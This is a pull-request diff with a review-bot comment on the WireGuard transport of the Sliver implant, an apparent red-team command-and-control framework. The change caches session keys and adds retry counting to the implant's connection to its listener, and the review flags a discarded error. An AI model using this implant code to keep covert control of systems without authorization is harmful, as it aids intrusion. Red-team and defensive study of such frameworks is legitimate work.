Merge pull request #893 from jamesgol/wireshark-sessions
Save implant Wireguard session keys
moloch-- authored Sep 21, 2022
2 parents 6c21d34 + d41833c commit 1194920
Showing 1 changed file with 23 additions and 10 deletions.
33 changes: 23 additions & 10 deletions implant/sliver/transports/wireguard/wireguard.go
Expand Up @@ -59,7 +59,11 @@ var (
wgKeyExchangePort = getWgKeyExchangePort()
wgTcpCommsPort = getWgTcpCommsPort()

wgSessPrivKey string
wgSessPubKey string

PingInterval = 2 * time.Minute
failedConn = 0
)

// GetTNet - Get the netstack Net object
Expand Down Expand Up @@ -151,12 +155,11 @@ func ReadEnvelope(connection net.Conn) (*pb.Envelope, error) {
return envelope, nil
}

// WGConnect - Get a wg connection or die trying
func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {

// getSessKeys - Connect to the wireguard server and retrieve session specific keys and IP
func getSessKeys(address string, port uint16) error {
_, dev, tNet, err := bringUpWGInterface(address, port, wgImplantPrivKey, wgServerPubKey, wgPeerTunIP)
if err != nil {
return nil, nil, err
return err
}

dev.Up()
Expand All @@ -170,10 +173,10 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Unable to connect to wg key exchange listener: %v", err)
// {{end}}
return nil, nil, err
return err
}

privKey, pubKey, newIP := doKeyExchange(keyExchangeConnection)
wgSessPrivKey, wgSessPubKey, tunAddress = doKeyExchange(keyExchangeConnection)

// {{if .Config.Debug}}
log.Printf("Signaling wg device to go down")
Expand All @@ -186,12 +189,21 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Failed to close device.Device: %s", err)
// {{end}}
return nil, nil, err
return err
}
return nil
}

// WGConnect - Get a wg connection or die trying
func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
if wgSessPrivKey == "" || failedConn > 2 {
getSessKeys(address, port)
}

// Bring up second wireguard connection using retrieved keys and IP
_, dev, tNet, err = bringUpWGInterface(address, port, privKey, pubKey, newIP)
// Bring up actual wireguard connection using retrieved keys and IP
_, dev, tNet, err := bringUpWGInterface(address, port, wgSessPrivKey, wgSessPubKey, tunAddress)
if err != nil {
failedConn++
return nil, nil, err
}

Expand All @@ -200,14 +212,15 @@ func WGConnect(address string, port uint16) (net.Conn, *device.Device, error) {
// {{if .Config.Debug}}
log.Printf("Unable to connect to sliver listener: %v", err)
// {{end}}
failedConn++
return nil, nil, err
}

// {{if .Config.Debug}}
log.Printf("Successfully connected to sliver listener")
// {{end}}
failedConn = 0
tunnelNet = tNet
tunAddress = newIP
return connection, dev, nil
}
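Review bot: The error returned by getSessKeys at the top of WGConnect is discarded, so when the key-exchange connection fails the function continues into bringUpWGInterface with wgSessPrivKey still empty (or stale from an earlier session) instead of reporting the failure as the pre-change code did. Wrap the call: `if err := getSessKeys(address, port); err != nil {` / `return nil, nil, err` / `}` inside the existing guard. A smaller point: the guard only tests wgSessPrivKey, so if doKeyExchange ever left wgSessPubKey or tunAddress unset the triple would not be re-exchanged; checking all three, or having getSessKeys reset them on failure, would make the retry path easier to reason about. Parts of both getSessKeys and WGConnect sit in the collapsed regions between the hunks, so the remaining error paths could not be checked here.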

